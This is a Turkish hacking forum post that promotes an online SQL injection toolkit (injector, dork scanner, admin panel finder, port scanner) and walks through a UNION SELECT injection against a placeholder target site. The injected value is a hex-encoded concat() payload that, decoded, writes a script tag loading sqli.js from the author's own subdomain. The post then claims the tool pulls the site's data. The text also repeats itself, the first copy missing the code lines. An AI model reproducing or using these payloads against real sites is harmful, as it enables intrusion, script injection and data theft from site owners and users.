Sql İnjection Tools
http://dasasdsf.freesubdomain.org/sql.php
Java Script Sql Code
Evet arkadaşlar yeni bir özellik daha ekledim İsdeiğiniz bir sql açıklı siteyi site üzerinde link oynuyarak javascript kodu ile rahatlıkla injection yapabilirsinizz... Sihirli Kodumuz =
Bunu sadece kolon sayısı yansıyan yere ekliyeceğiz
İlk önce http://hedefsite/index.php?id=1
sitemiz bu sql açığı varsayalım
Daha sonra kolon sayısını bulalım buda 5 olsun
İşleme devam ediyoruz union+select+1,2,3,4,5 ekranımıza sayılarımız geldi 2 ve 4 yansıdı ekrana
Ya da
Daha sonra get url ye tıklıyoruz ve
http://hedefsite.com/index.php?id=1
gibi yazıyoruz sonra injectora tıklıyoruz...
Evet gördüğümüz üzere kendisi çekebiliyor verileri
Dork Scanner
http://dasasdsf.freesubdomain.org/dork.php
Admin Panel Finder
http://dasasdsf.freesubdomain.org/admin.php
Özellikler
Online php script içinde sql injection yapabilirsiniz.
Online olarak admin panel bulabilirsiniz...
English
SQL Vulnerability sCanner Port Scanner
Admin Panel finder
Simple Web Crawler
Simple Server Fuzzer
Directory Traversal
Siteyi geliştirmekteyim
http://dasasdsf.freesubdomain.org/sql.php
Java Script Sql Code
Evet arkadaşlar yeni bir özellik daha ekledim İsdeiğiniz bir sql açıklı siteyi site üzerinde link oynuyarak javascript kodu ile rahatlıkla injection yapabilirsinizz... Sihirli Kodumuz =
Kod:
concat((0x3c736372697074207372633d27687474703a2f2f64617361736473662e66726565737562646f6d61696e2e6f72672f73716c692e6a73273e3c2f7363726970743e))
Bunu sadece kolon sayısı yansıyan yere ekliyeceğiz
İlk önce http://hedefsite/index.php?id=1
sitemiz bu sql açığı varsayalım
Daha sonra kolon sayısını bulalım buda 5 olsun
İşleme devam ediyoruz union+select+1,2,3,4,5 ekranımıza sayılarımız geldi 2 ve 4 yansıdı ekrana
Kod:
http://hedefsite.com/index.php?id=-1+union+select+1,concat((0x3c736372697074207372633d27687474703a2f2f64617361736473662e66726565737562646f6d61696e2e6f72672f73716c692e6a73273e3c2f7363726970743e)),3,4,5
Ya da
Kod:
http:/hedefsite.com/index.php?id=-1+union+select+1,2,3,concat((0x3c736372697074207372633d27687474703a2f2f64617361736473662e66726565737562646f6d61696e2e6f72672f73716c692e6a73273e3c2f7363726970743e)),5
Daha sonra get url ye tıklıyoruz ve
http://hedefsite.com/index.php?id=1
gibi yazıyoruz sonra injectora tıklıyoruz...
Evet gördüğümüz üzere kendisi çekebiliyor verileri
Dork Scanner
http://dasasdsf.freesubdomain.org/dork.php
Admin Panel Finder
http://dasasdsf.freesubdomain.org/admin.php
Özellikler
Online php script içinde sql injection yapabilirsiniz.
Online olarak admin panel bulabilirsiniz...
English
SQL Vulnerability sCanner Port Scanner
Admin Panel finder
Simple Web Crawler
Simple Server Fuzzer
Directory Traversal
Siteyi geliştirmekteyim